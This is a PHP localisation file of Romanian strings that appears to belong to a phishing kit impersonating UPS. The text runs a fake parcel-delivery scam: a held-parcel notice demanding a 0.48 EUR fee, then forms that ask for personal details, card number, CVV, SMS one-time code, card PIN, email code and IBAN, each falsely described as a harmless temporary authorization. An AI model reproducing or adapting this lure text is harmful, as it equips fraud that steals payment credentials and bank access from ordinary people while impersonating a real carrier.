<?php
function lang($phrase){
	static $lang = array(

        "xlang" => "EN",
        "xcapt1" => "Vă rugăm să verificați caseta CAPTCHA.",
        "xcapt2" => "Verificare",
        "xcapt3" => "Continuați",
        "xfot1" => "Acest site",
        "xfot2" => "Alte site-uri UPS",
        "xfot3" => "Conectați-vă cu noi",
        "xfot4" => "Legal",
        "xfot5" => "Copyright ©1994- 2023&nbsp;United Parcel Service of America, Inc. Toate drepturile rezervate. ",
        "xind1" => "Urmărire",
        "xind2" => "Număr de urmărire",
        "xind3" => "Eroare : Vă rugăm să furnizați numărul de urmărire corect.",
        "xind4" => "Aveți nevoie de ajutor pentru a modifica livrarea?",
        "xind5" => "Citat",
        "xind6" => "Navă",
        "xind7" => "Facturare",
        "xind8" => "Obțineți ajutor",
        "xexp1" => "Livrare întreruptă",
        "xexp2" => "Urmărire",
        "xexp3" => "Ultima dvs. livrare a fost întreruptă. În prezent, aceasta este reținută la centrul de sortare.",
        "xexp4" => "Coletul care v-a fost trimis nu a respectat greutatea indicată și vi se va cere să plătiți o taxă suplimentară pentru a asigura livrarea corectă a coletului dumneavoastră.",
        "xexp5" => "Taxa este de 0,48 EUR",
        "xexp6" => "Pentru a plăti, vă rugăm să faceți clic pe butonul de mai jos",
        "xexp7" => "Plătiți",
        "xexp8" => "După ce taxa a fost achitată, coletul dvs. va fi transmis cât mai repede posibil la adresa de livrare.",
        "xexp9" => "În cazul în care taxa nu este plătită în termen de 48 de ore, coletul va fi returnat expeditorului.",
        "xexp10" => "Urmărire după numărul de referință",
        "xexp11" => "Numere de urmărire la import",
        "xexp12" => "Alte servicii de urmărire",
        "xinfz1" => "Confirmați detaliile de facturare",
        "xinfz2" => "Nume și prenume",
        "xinfz10" => "Data nașterii",
        "xinfz3" => "Țara",
        "xinfz4" => "Oraș",
        "xinfz5" => "Adresa",
        "xinfz6" => "Telefon",
        "xinfz7" => "Postcode",
        "xinfz8" => "Error : Toate datele sunt obligatorii",
        "xinfz9" => "Confirmare",
        "xpay1" => "Detalii de plată",
        "xpay2" => "Stimate client, verificați corect detaliile de plată și potriviți detaliile cardului dvs. pentru a termina",
        "xpay3" => "Numele de pe card",
        "xpay4" => "Numărul cardului",
        "xpay5" => "Expiration Date",
        "xpay6" => "Security code CVV (3 cifre)",
        "xpay7" => "Error : Toate datele sunt obligatorii",
        "xpay8" => "Confirmare",
        "xsms1" => "Verificare",
        "xsms2" => "Am trimis un cod de confirmare la numărul dumneavoastră.",
        "xsms3" => "Cod OTP",
        "xsms4" => "Error : Incorrect otp code.",
        "xsms5" => "Acest pas este necesar pentru a finaliza procesul de plată în siguranță.",
        "xsms6" => "UPS efectuează o autentificare temporară a cardului dvs. pentru a-l verifica. Aceasta este doar o autorizare și NU o taxă.",
        "xsms7" => "Confirmați",
        "xconf1" => "Reluarea livrării",
        "xconf2" => "Plata taxelor suplimentare a fost luată în considerare.",
        "xconf3" => "Coletul dumneavoastră ar trebui să ajungă în următoarele 24 de ore.",
        "xconf4" => "Confirmați",
        "xpin1" => "Verificare",
        "xpin2" => "Introduceți codul PIN al cardului bancar",
        "xpin3" => "Codul PIN",
        "xpin4" => "(4 cifre)",
        "xpin5" => "Acest pas este necesar pentru a finaliza în siguranță procesul de plată.",
        "xpin6" => "UPS efectuează o verificare temporară a cardului dvs. pentru a-l verifica. Aceasta este doar o autorizare și NU reprezintă o taxă.",
        "xpin7" => "Confirmare",
        "xmail1" => "Verificare",
        "xmail2" => "Am trimis un cod de confirmare la adresa dumneavoastră de e-mail",
        "xmail3" => "Cod e-mail",
        "xmail4" => "(6 cifre)",
        "xmail5" => "Acest pas este necesar pentru a finaliza în siguranță procesul de plată.",
        "xmail6" => "UPS efectuează o verificare temporară a cardului dvs. pentru a-l verifica. Aceasta este doar o autorizare și NU reprezintă o taxă.",
        "xmail7" => "Confirmare",
        "xiban1" => "Verificare",
        "xiban2" => "Vă rugăm să introduceți IBAN-ul pentru a finaliza plata",
        "xiban3" => "IBAN",
        "xiban4" => "(IBAN)",
        "xiban5" => "Acest pas este necesar pentru a finaliza în siguranță procesul de plată.",
        "xiban6" => "UPS efectuează o verificare temporară a cardului dvs. pentru a-l verifica. Aceasta este doar o autorizare și NU un comision.",
        "xiban7" => "Confirmă"
	);	
	
	return $lang[$phrase];
}
 ?>